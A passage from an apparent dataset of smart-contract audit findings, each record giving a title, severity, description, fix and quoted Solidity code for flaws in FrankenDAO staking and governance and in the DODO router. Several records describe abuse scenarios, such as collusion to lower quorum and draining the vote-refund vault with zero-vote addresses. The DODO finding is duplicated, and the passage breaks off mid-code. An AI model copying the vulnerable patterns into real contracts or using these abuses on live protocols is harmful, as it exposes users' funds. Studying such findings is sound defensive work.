stored. This means that any changes to stakingSettings.maxStakeBonusAmount or stakingSettings.maxStakeBonusTime won't affect tokens that are already stored. Storing the value is essential to prevent changes to the values causing major damage to the voting, but it leads to other more subtle issue when it is changed that will put either existing or new stakers at a disadvantage.\\nExample: User A stake when maxStakeBonusAmount = 10 and stake long enough to get the entire bonus. Now maxStakeBonusAmount is changed to 20. User A is unable to unstake their token right away because it is locked. They are now at a disadvantage because other users can now stake and get a bonus of 20 while they are stuck with only a bonus of 10. Now maxStakeBonusAmount is changed to 5. User A now has an advantage because other users can now only stake for a bonus of 5. If User A never unstakes then they will forever have that advantage over new users.чI recommend implementing a poke function that can be called by any user on any user. This function should loop through all tokens (or the tokens specified) and recalculate their voting power based on current multipliers, allowing all users to be normalized to prevent any abuse.чVoting power becomes skewed for users when Staking#changeStakeTime and changeStakeAmount are usedч```\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n unlockTime[_tokenId] = _unlockTime;\\n uint fullStakedTimeBonus = ((_unlockTime - block.timestamp) * stakingSettings.maxStakeBonusAmount) / stakingSettings.maxStakeBonusTime;\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? fullStakedTimeBonus : fullStakedTimeBonus / 2;\\n }\\n```\\n -Adversary can abuse delegating to lower quorumчmediumчWhen a user delegates to another user they surrender their community voting power. The quorum threshold for a vote is determined when it is created. Users can artificially lower quorum by delegating to other users then creating a proposal. After it's created they can self delegate and regain all their community voting power to reach quorum easier.\\n```\\n// If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\nif (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n// If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n} else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n}\\n```\\n\\nWhen a user delegates to user other than themselves, they forfeit their community votes and lowers the total number of votes. When they self delegate again they will recover all their community voting power.\\n```\\n newProposal.id = newProposalId.toUint96();\\n newProposal.proposer = msg.sender;\\n newProposal.targets = _targets;\\n newProposal.values = _values;\\n newProposal.signatures = _signatures;\\n newProposal.calldatas = _calldatas;\\n\\n //@audit quorum votes locked at creation\\n\\n newProposal.quorumVotes = quorumVotes().toUint24();\\n newProposal.startTime = (block.timestamp + votingDelay).toUint32();\\n newProposal.endTime = (block.timestamp + votingDelay + votingPeriod).toUint32();\\n```\\n\\nWhen a proposal is created the quorum is locked at the time at which it's created. Users can combine these two quirks to abuse the voting.\\nExample:\\nAssume there is 1000 total votes and quorum is 20%. Assume 5 users each have 35 votes, 10 base votes and 25 community votes. In this scenario quorum is 200 votes which they can't achieve. Each user delegates to other users, reducing each of their votes by 25 and reducing the total number of votes of 875. Now they can create a proposal and quorum will now be 175 votes (875*20%). They all self delegate and recover their community votes. Now they can reach quorum and pass their proposal.чOne solution would be to add a vote cooldown to users after they delegate, long enough to make sure all active proposals have expired before they're able to vote. The other option would be to implement checkpoints.чUsers can collude to lower quorum and pass proposal easierч```\\n// If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\nif (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n// If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n} else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n}\\n```\\n -castVote can be called by anyone even those without votesчmediumчGovernance#castVote can be called by anyone, even users that don't have any votes. Since the voting refund is per address, an adversary could use a large number of addresses to vote with zero votes to drain the vault.\\n```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n\\nNowhere in the flow of voting does the function revert if the user calling it doesn't actually have any votes. staking#getVotes won't revert under any circumstances. Governance#_castVote only reverts if 1) the proposal isn't active 2) support > 2 or 3) if the user has already voted. The result is that any user can vote even if they don't have any votes, allowing users to maliciously burn vault funds by voting and claiming the vote refund.чGovernance#_castVote should revert if msg.sender doesn't have any votes:\\n```\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n+ if (votes == 0) revert NoVotes();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n```\\nчVault can be drained maliciously by users with no votesч```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n -[Tomo-M3] Use safeMint instead of mint for ERC721чmediumчUse safeMint instead of mint for ERC721\\nThe `msg.sender` will be minted as a proof of staking NFT when `_stakeToken()` is called.\\nHowever, if `msg.sender` is a contract address that does not support ERC721, the NFT can be frozen in the contract.\\nAs per the documentation of EIP-721:\\nA wallet/broker/auction application MUST implement the wallet interface if it will accept safe transfers.\\nAs per the documentation of ERC721.sol by Openzeppelin\\n```\\n/**\\n * @dev Mints `tokenId` and transfers it to `to`.\\n *\\n * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible\\n *\\n * Requirements:\\n *\\n * - `tokenId` must not exist.\\n * - `to` cannot be the zero address.\\n *\\n * Emits a {Transfer} event.\\n */\\nfunction _mint(address to, uint256 tokenId) internal virtual {\\n```\\nчUse `safeMint` instead of `mint` to check received address support for ERC721 implementation.чUsers possibly lose their NFTsч```\\n/**\\n * @dev Mints `tokenId` and transfers it to `to`.\\n *\\n * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible\\n *\\n * Requirements:\\n *\\n * - `tokenId` must not exist.\\n * - `to` cannot be the zero address.\\n *\\n * Emits a {Transfer} event.\\n */\\nfunction _mint(address to, uint256 tokenId) internal virtual {\\n```\\n -[Medium-1] Hardcoded `monsterMultiplier` in case of `stakedTimeBonus` disregards the updates done to `monsterMultiplier` through `setMonsterMultiplier()`чmediumч[Medium-1] Hardcoded `monsterMultiplier` in case of `stakedTimeBonus` disregards the updates done to `monsterMultiplier` through `setMonsterMultiplier()`\\nFrankenDAO allows users to stake two types of NFTs, `Frankenpunks` and `Frankenmonsters` , one of which is considered more valuable, ie: `Frankenpunks`,\\nThis is achieved by reducing votes applicable for `Frankenmonsters` by `monsterMultiplier`.\\n```\\nfunction getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n\\nThis `monsterMultiplier` is initially set as 50 and could be changed by governance proposal.\\n```\\nfunction setMonsterMultiplier(uint _monsterMultiplier) external onlyExecutor {\\n emit MonsterMultiplierChanged(monsterMultiplier = _monsterMultiplier); \\n }\\n```\\n\\nHowever, one piece of code inside the FrakenDAO staking contract doesn't consider this and has a monster multiplier hardcoded.\\n```\\nfunction stake(uint[] calldata _tokenIds, uint _unlockTime) \\n----\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n --------\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? **fullStakedTimeBonus : fullStakedTimeBonus / 2;** \\n }\\n--------\\n```\\n\\nHence any update done to `monsterMultiplier` would not reflect in the calculation of `stakedTimeBonus`, and thereby votes.чConsider replacing the hardcoded value with monsterMultiplierчAny update done to monsterMultiplier would not be reflected in stakedTimeBonus; it would always remain as /2 or 50%.\\nLikelihood: Medium\\nOne needs to pass a governance proposal to change the monster multiplier, so this is definitely not a high likelihood; it's not low as well, as there is a clear provision in spec regarding this.ч```\\nfunction getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n -`getCommunityVotingPower` doesn't calculate voting Power correctly due to precision lossчmediumчIn `Staking.sol`, the getCommunityVotingPower function, doesn't calculate the votes correctly due to precision loss.\\nIn getCommunityVotingPower function, the `return` statement is where the mistake lies in:\\n```\\n return \\n (votes * cpMultipliers.votes / PERCENT) + \\n (proposalsCreated * cpMultipliers.proposalsCreated / PERCENT) + \\n (proposalsPassed * cpMultipliers.proposalsPassed / PERCENT);\\n```\\n\\nHere, after each multiplication by the `Multipliers`, we immediately divide it by `PERCENT`. Every time we do a division, there is a certain amount of precision loss. And when its done thrice, the loss just accumulates. So instead, the division by `PERCENT` should be done after all 3 terms are added together.\\nNote that this loss is not there, if the `Multipliers` are a multiple of `PERCENT`. But these values can be changed through governance later. So its better to be careful assuming that they may not always be a multiple of `PERCENT`.чDo the division once after all terms are added together:\\n```\\n return \\n ( (votes * cpMultipliers.votes) + \\n (proposalsCreated * cpMultipliers.proposalsCreated) + \\n (proposalsPassed * cpMultipliers.proposalsPassed) ) / PERCENT;\\n }\\n```\\nчThe community voting power of the user is calculated wrongly.ч```\\n return \\n (votes * cpMultipliers.votes / PERCENT) + \\n (proposalsCreated * cpMultipliers.proposalsCreated / PERCENT) + \\n (proposalsPassed * cpMultipliers.proposalsPassed / PERCENT);\\n```\\n -Delegate can keep can keep delegatee trapped indefinitelyчmediumчUsers are allowed to delegate their votes to other users. Since staking does not implement checkpoints, users are not allowed to delegate or unstake during an active proposal if their delegate has already voted. A malicious delegate can abuse this by creating proposals so that there is always an active proposal and their delegatees are always locked to them.\\n```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n\\nThe above modifier is applied when unstaking or delegating. This reverts if the delegate of msg.sender either has voted or currently has an open proposal. The result is that under those conditions, the delgatee cannot unstake or delegate. A malicious delegate can abuse these conditions to keep their delegatees forever delegated to them. They would keep opening proposals so that delegatees could never unstake or delegate. A single users can only have a one proposal opened at the same time so they would use a secondary account to alternate and always keep an active proposal.чThere should be a function to emergency eject the token from staking. To prevent abuse a token that has been emergency ejected should be blacklisted from staking again for a certain cooldown period, such as the length of current voting period.чDelegatees can never unstake or delegate to anyone elseч```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n -Rounding error when call function `dodoMultiswap()` can lead to revert of transaction or fund of userчmediumчThe calculation of the proportion when do the split swap in function `_multiSwap` doesn't care about the rounding error\\nThe amount of `midToken` will be transfered to the each adapter can be calculated by formula `curAmount = curTotalAmount * weight / totalWeight`\\n```\\nif (assetFrom[i - 1] == address(this)) {\\n uint256 curAmount = curTotalAmount * curPoolInfo.weight / curTotalWeight;\\n\\n\\n if (curPoolInfo.poolEdition == 1) {\\n //For using transferFrom pool (like dodoV1, Curve), pool call transferFrom function to get tokens from adapter\\n IERC20(midToken[i]).transfer(curPoolInfo.adapter, curAmount);\\n } else {\\n //For using transfer pool (like dodoV2), pool determine swapAmount through balanceOf(Token) - reserve\\n IERC20(midToken[i]).transfer(curPoolInfo.pool, curAmount);\\n }\\n}\\n```\\n\\nIt will lead to some scenarios when `curTotalAmount * curPoolInfo.weight` is not divisible by `curTotalWeight`, there will be some token left after the swap.\\nFor some tx, if user set a `minReturnAmount` strictly, it may incur the reversion. For some token with small decimal and high value, it can make a big loss for the sender.чAdd a accumulation variable to maintain the total amount is transfered after each split swap. In the last split swap, instead of calculating the `curAmount` by formula above, just take the remaining amount to swap.чRevert the transaction because not enough amount of `toToken`\\nSender can lose a small amount of tokensч```\\nif (assetFrom[i - 1] == address(this)) {\\n uint256 curAmount = curTotalAmount * curPoolInfo.weight / curTotalWeight;\\n\\n\\n if (curPoolInfo.poolEdition == 1) {\\n //For using transferFrom pool (like dodoV1, Curve), pool call transferFrom function to get tokens from adapter\\n IERC20(midToken[i]).transfer(curPoolInfo.adapter, curAmount);\\n } else {\\n //For using transfer pool (like dodoV2), pool determine swapAmount through balanceOf(Token) - reserve\\n IERC20(midToken[i]).transfer(curPoolInfo.pool, curAmount);\\n }\\n}\\n```\\n -Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwapчmediumчLack of logic to wrap the native ETH to WETH in function externalSwap\\nThe function exeternalSwap can handle external swaps with 0x, 1inch and paraswap or other external resources.\\n```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], \"DODORouteProxy: Not Whitelist Contract\"); \\n require(isApproveWhiteListedContract[approveTarget], \"DODORouteProxy: Not Whitelist Appprove Contract\"); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nnote the code above, if the fromToken is set to _ETH_ADDRESS, indicating the user wants to trade with native ETH pair. the function does has payable modifier and user can send ETH along when calling this function.\\nHowever, the toTokenOriginBalance is check the only WETH balance instead of ETH balance.\\n```\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nThen we do the swap:\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nIf the fromToken is _ETH_ADDRESS, we send the user supplied fromTokenAmount without verifying that the fromTokenAmount.\\nFinally, we use the before and after balance to get the amount with received.\\n```\\n// calculate toToken amount\\n if(toToken != _ETH_ADDRESS_) {\\n receiveAmount = IERC20(toToken).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n } else {\\n receiveAmount = IERC20(_WETH_).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n }\\n```\\n\\nWe are checking the WETH amount instead of ETH amount again.\\nThe issue is that some trades may settle the trade in native ETH, for example\\nwe can look into the Paraswap contract\\nIf we click the implementation contract and see the method swapOnUniswapV2Fork\\nCode line 927 - 944, which calls the function\\n```\\nfunction swapOnUniswapV2Fork(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] calldata pools\\n)\\n external\\n payable\\n{\\n _swap(\\n tokenIn,\\n amountIn,\\n amountOutMin,\\n weth,\\n pools\\n );\\n}\\n```\\n\\nwhich calls:\\n```\\n function _swap(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] memory pools\\n )\\n private\\n returns (uint256 tokensBought)\\n {\\n uint256 pairs = pools.length;\\n\\n require(pairs != 0, \"At least one pool required\");\\n\\n bool tokensBoughtEth;\\n\\n if (tokenIn == ETH_IDENTIFIER) {\\n require(amountIn == msg.value, \"Incorrect msg.value\");\\n IWETH(weth).deposit{value: msg.value}();\\n require(IWETH(weth).transfer(address(pools[0]), msg.value));\\n } else {\\n require(msg.value == 0, \"Incorrect msg.value\");\\n transferTokens(tokenIn, msg.sender, address(pools[0]), amountIn);\\n tokensBoughtEth = weth != address(0);\\n }\\n\\n tokensBought = amountIn;\\n\\n for (uint256 i = 0; i < pairs; ++i) {\\n uint256 p = pools[i];\\n address pool = address(p);\\n bool direction = p & DIRECTION_FLAG == 0;\\n\\n tokensBought = NewUniswapV2Lib.getAmountOut(\\n tokensBought, pool, direction, p FEE_OFFSET\\n );\\n (uint256 amount0Out, uint256 amount1Out) = direction\\n ? (uint256(0), tokensBought) : (tokensBought, uint256(0));\\n IUniswapV2Pair(pool).swap(\\n amount0Out,\\n amount1Out,\\n i + 1 == pairs\\n ? (tokensBoughtEth ? address(this) : msg.sender)\\n : address(pools[i + 1]),\\n \"\"\\n );\\n }\\n\\n if (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n }\\n\\n require(tokensBought >= amountOutMin, \"UniswapV2Router: INSUFFICIENT_OUTPUT_AMOUNT\");\\n }\\n```\\n\\nas can clearly see, the code first receive ETH, wrap ETH to WETH, then instead end, unwrap the WETH to ETH and the send the ETH back to complete the trade.\\n```\\nif (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n}\\n```\\n\\nIn DODORouterProxy.sol#ExternalSwap however, we are using WETH balance before and after to check the received amount,\\nbut if we call swapOnUniswapV2Fork on Paraswap router, the balance change for WETH would be 0\\nbecause as we see above, the method on paraswap side wrap ETH to WETH but in the end unwrap WETH and send ETH back.\\nThere is also a lack of a method to wrap the ETH to WETH before the trade. making the ETH-related order not tradeable.чIssue Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwap\\nWe recommend the project change from\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_ETH_ADDRESS).universalBalanceOf(address(this));\\n }\\n```\\n\\nIf we want to use WETH to do the balance check, we can help the user wrap the ETH to WETH by calling before do the balance check.\\n```\\nIWETH(_WETH_).deposit(receiveAmount);\\n```\\n\\nIf we want to use WETH as the reference to trade, we also need to approve external contract to spend our WETH.\\nWe can add\\n```\\nif(fromToken == _ETH_ADDRESS) {\\n IERC20(_WETH_).universalApproveMax(approveTarget, fromTokenAmount);\\n}\\n```\\n\\nWe also need to verify the fromTokenAmount for\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nwe can add the check:\\n```\\nrequire(msg.value == fromTokenAmount, \"invalid ETH amount\");\\n```\\nчA lot of method that does not use WETH to settle the trade will not be callable.ч```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], \"DODORouteProxy: Not Whitelist Contract\"); \\n require(isApproveWhiteListedContract[approveTarget], \"DODORouteProxy: Not Whitelist Appprove Contract\"); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n -Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwapчmediumчLack of logic to wrap the native ETH to WETH in function externalSwap\\nThe function exeternalSwap can handle external swaps with 0x, 1inch and paraswap or other external resources.\\n```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], \"DODORouteProxy: Not Whitelist Contract\"); \\n require(isApproveWhiteListedContract[approveTarget], \"DODORouteProxy: Not Whitelist Appprove Contract\"); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nnote the code above, if the fromToken is set to _ETH_ADDRESS, indicating the user wants to trade with native ETH pair. the function does has payable modifier and user can send ETH along when calling this function.\\nHowever, the toTokenOriginBalance is check the only WETH balance instead of ETH balance.\\n```\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nThen we do the swap:\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nIf the fromToken is _ETH_ADDRESS, we send the user supplied fromTokenAmount without verifying that the fromTokenAmount.\\nFinally, we use the before and after balance to get the amount with received.\\n```\\n// calculate toToken amount\\n if(toToken != _ETH_ADDRESS_) {\\n receiveAmount = IERC20(toToken).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n } else {\\n receiveAmount = IERC20(_WETH_).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n }\\n```\\n\\nWe are checking the WETH amount instead of ETH amount again.\\nThe issue is that some trades may settle the trade in native ETH, for example\\nwe can look into the Paraswap contract\\nIf we click the implementation contract and see the method swapOnUniswapV2Fork\\nCode line 927 - 944, which calls the function\\n```\\nfunction swapOnUniswapV2Fork(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] calldata pools\\n)\\n external\\n payable\\n{\\n _swap(\\n tokenIn,\\n amountIn,\\n amountOutMin,\\n weth,\\n pools\\n );\\n}\\n```\\n\\nwhich calls:\\n```\\n function _swap(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] memory pools\\n )\\n private\\n returns (uint256 tokensBought)\\n {\\n uint256 pairs = pools.length;\\n\\n require(pairs != 0, \"At least one pool required\");\\n\\n bool tokensBoughtEth;\\n\\n if (tokenIn == ETH_IDENTIFIER) {\\n require(amountIn == msg.value, \"Incorrect msg.value\");\\n IWETH(weth).deposit{value: msg.value}();\\n require(IWETH(weth).transfer(address(pools[0]), msg.value));\\n } else {\\n require(msg.value == 0, \"Incorrect msg.value\");\\n transferTokens(tokenIn, msg.sender, address(pools[0]), amountIn);\\n tokensBoughtEth = weth != address(0);\\n }\\n\\n tokensBought = amountIn;\\n\\n for (uint256 i = 0; i < pairs; ++i) {\\n uint256 p = pools[i];\\n address pool = address(p);\\n bool direction = p & DIRECTION_FLAG == 0;\\n\\n tokensBought = NewUniswapV2Lib.getAmountOut(\\n tokensBought, pool, direction, p FEE_OFFSET\\n );\\n (uint256 amount0Out, uint256 amount1Out) = direction\\n ? (uint256(0), tokensBought) : (tokensBought, uint256(0));\\n IUniswapV2Pair(pool).swap(\\n amount0Out,\\n amount1Out,\\n i + 1 == pairs\\n ? (tokensBoughtEth ? address(this) : msg.sender)\\n : address(pools[i + 1]),\\n \"\"\\n );\\n }\\n\\n if (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n }\\n\\n require(tokensBought >= amountOutMin, \"UniswapV2Router: INSUFFICIENT_OUTPUT_AMOUNT\");\\n }\\n```\\n\\nas can clearly see, the code first receive ETH, wrap ETH to WETH, then instead end, unwrap the WETH to ETH and the send the ETH back to complete the trade.\\n```\\nif (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n}\\n```\\n\\nIn DODORouterProxy.sol#ExternalSwap however, we are using WETH balance before and after to check the received amount,\\nbut if we call swapOnUniswapV2Fork on Paraswap router, the balance change for WETH would be 0\\nbecause as we see above, the method on paraswap side wrap ETH to WETH but in the end unwrap WETH and send ETH back.\\nThere is also a lack of a method to wrap the ETH to WETH before the trade. making the ETH-related order not tradeable.чWe recommend the project change from\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_ETH_ADDRESS).universalBalanceOf(address(this));\\n }\\n```\\n\\nIf we want to use WETH to do the balance check, we can help the user wrap the ETH to WETH by calling before do the balance check.\\n```\\nIWETH(_WETH_).deposit(receiveAmount);\\n```\\n\\nIf we want to use WETH as the reference to trade, we also need to approve external contract to spend our WETH.\\nWe can add\\n```\\nif(fromToken == _ETH_ADDRESS) {\\n IERC20(_WETH_).universalApproveMax(approveTarget, fromTokenAmount);\\n}\\n```\\n\\nWe also need to verify the fromTokenAmount for\\n```\\n(bool success, bytes memory result) = 